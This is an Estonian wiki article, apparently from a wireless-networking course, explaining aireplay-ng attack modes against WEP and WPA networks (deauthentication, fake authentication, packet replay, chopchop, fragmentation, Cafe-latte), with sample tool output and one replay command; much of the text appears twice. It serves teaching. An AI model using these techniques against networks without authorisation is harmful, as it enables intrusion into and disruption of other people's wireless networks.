Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:29:05Z

Tliiv: /* Teooria */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
